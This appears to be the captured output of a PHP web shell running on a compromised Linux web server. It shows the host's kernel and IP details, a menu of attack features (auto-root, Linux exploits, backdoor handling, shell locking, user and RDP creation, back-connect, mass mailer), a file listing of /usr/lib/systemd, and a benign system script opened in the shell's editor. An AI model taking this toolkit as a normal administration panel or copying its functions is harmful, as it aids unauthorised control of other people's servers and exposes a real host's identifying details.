Linux ip-172-31-23-120.eu-west-1.compute.internal 5.10.245-245.983.amzn2.x86_64 #1 SMP Wed Dec 3 00:02:10 UTC 2025 x86_64
Apache/2.4.65 () OpenSSL/1.0.2k-fips
: 172.31.23.120 | : 64.252.114.95
Cant Read [ /etc/named.conf ]
8.2.29
apache
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
systemd /
[ HOME SHELL ]
Name
Size
Permission
Action
catalog
[ DIR ]
drwxr-xr-x
logind.conf.d
[ DIR ]
drwxr-xr-x
ntp-units.d
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
system-generators
[ DIR ]
drwxr-xr-x
system-preset
[ DIR ]
drwxr-xr-x
system-shutdown
[ DIR ]
drwxr-xr-x
system-sleep
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
user-generators
[ DIR ]
drwxr-xr-x
user-preset
[ DIR ]
drwxr-xr-x
import-pubring.gpg
9.33
KB
-rw-r--r--
rhel-autorelabel
2.31
KB
-rwxr-xr-x
rhel-configure
399
B
-rwxr-xr-x
rhel-dmesg
110
B
-rwxr-xr-x
rhel-dmraid-activation
599
B
-rwxr-xr-x
rhel-domainname
158
B
-rwxr-xr-x
rhel-import-state
1.03
KB
-rwxr-xr-x
rhel-loadmodules
233
B
-rwxr-xr-x
rhel-readonly
5.77
KB
-rwxr-xr-x
systemd
1.52
MB
-rwxr-xr-x
systemd-ac-power
19.33
KB
-rwxr-xr-x
systemd-activate
60.45
KB
-rwxr-xr-x
systemd-backlight
68.97
KB
-rwxr-xr-x
systemd-binfmt
56.66
KB
-rwxr-xr-x
systemd-bootchart
116.97
KB
-rwxr-xr-x
systemd-cgroups-agent
31.84
KB
-rwxr-xr-x
systemd-coredump
117.74
KB
-rwxr-xr-x
systemd-cryptsetup
97.2
KB
-rwxr-xr-x
systemd-fsck
311.16
KB
-rwxr-xr-x
systemd-hibernate-resume
35.88
KB
-rwxr-xr-x
systemd-hostnamed
351.08
KB
-rwxr-xr-x
systemd-importd
347.62
KB
-rwxr-xr-x
systemd-initctl
289.75
KB
-rwxr-xr-x
systemd-journald
317.91
KB
-rwxr-xr-x
systemd-localed
359.14
KB
-rwxr-xr-x
systemd-logind
592.72
KB
-rwxr-xr-x
systemd-machine-id-commit
48.14
KB
-rwxr-xr-x
systemd-machined
457.8
KB
-rwxr-xr-x
systemd-modules-load
60.73
KB
-rwxr-xr-x
systemd-pull
171.02
KB
-rwxr-xr-x
systemd-quotacheck
35.88
KB
-rwxr-xr-x
systemd-random-seed
40.05
KB
-rwxr-xr-x
systemd-readahead
93.41
KB
-rwxr-xr-x
systemd-remount-fs
52.45
KB
-rwxr-xr-x
systemd-reply-password
35.87
KB
-rwxr-xr-x
systemd-rfkill
56.67
KB
-rwxr-xr-x
systemd-shutdown
138.61
KB
-rwxr-xr-x
systemd-shutdownd
60.45
KB
-rwxr-xr-x
systemd-sleep
81.08
KB
-rwxr-xr-x
systemd-socket-proxyd
101.43
KB
-rwxr-xr-x
systemd-sysctl
60.76
KB
-rwxr-xr-x
systemd-sysv-install
40.15
KB
-rwxr-xr-x
systemd-timedated
359.84
KB
-rwxr-xr-x
systemd-udevd
406.34
KB
-rwxr-xr-x
systemd-update-done
39.98
KB
-rwxr-xr-x
systemd-update-utmp
289.78
KB
-rwxr-xr-x
systemd-user-sessions
40.09
KB
-rwxr-xr-x
systemd-vconsole-setup
48.11
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rhel-import-state
#!/bin/bash # rhel-import-state: import state files from initramfs (e.g. network config) # Copy state into root folder: # ============================ cd /run/initramfs/state IFS_backup=$IFS IFS=$'\n' # Process find's results line by line dirs_found=$(find . -type d) for dir in $dirs_found; do pushd "$dir" > /dev/null # Remove initial '.' char from the find's result: dest_dir="${dir/\./}" # Create destination folder if it does not exist (with the same rights): if [[ -n "$dest_dir" && ! -d "$dest_dir" ]]; then mkdir -p "$dest_dir" chmod --reference="$PWD" "$dest_dir" chown --reference="$PWD" "$dest_dir" fi # Copy all files that are not directory: find . -mindepth 1 -maxdepth 1 -not -type d -exec cp -av -t "$dest_dir" {} \; > /dev/null popd > /dev/null done IFS=$IFS_backup # Run restorecon on the copied files: # =================================== if [ -e /sys/fs/selinux/enforce -a -x /usr/sbin/restorecon ]; then find . -mindepth 1 -print0 | { cd / && xargs --null restorecon -iF; } fi
Close